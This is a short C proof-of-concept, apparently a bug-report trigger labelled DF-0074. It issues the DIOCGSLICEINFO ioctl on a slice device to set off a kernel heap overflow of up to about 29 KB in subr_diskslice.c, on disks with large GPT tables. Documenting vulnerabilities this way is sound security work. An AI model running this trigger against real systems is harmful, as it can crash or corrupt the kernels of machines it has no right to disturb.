/*
 * DF-0074 trigger - issue DIOCGSLICEINFO on a slice device whose backing
 * disk has a GPT with >= 15 entries, causing the heap overflow in
 * subr_diskslice.c:557.
 *
 * Build:  cc -o trigger trigger.c
 * Usage:  ./trigger /dev/vnd0s1
 */
#include <sys/ioctl.h>
#include <sys/diskslice.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int
main(int argc, char **argv)
{
    const char *dev = (argc > 1) ? argv[1] : "/dev/vnd0s1";
    int fd;

    fd = open(dev, O_RDONLY);
    if (fd < 0) { perror("open"); return 1; }

    /* DIOCGSLICEINFO bcopy's dss_nslices-worth of struct diskslice into
     * a sizeof(struct diskslices) (16-slice) buffer.  For a GPT disk with
     * >= 15 entries this overflows the kernel heap by up to ~29 KB. */
    struct diskslices ds;
    if (ioctl(fd, DIOCGSLICEINFO, &ds) < 0) {
        perror("ioctl DIOCGSLICEINFO");
        close(fd);
        return 1;
    }
    fprintf(stderr, "DIOCGSLICEINFO returned nslices=%u\n", ds.dss_nslices);
    close(fd);
    return 0;
}
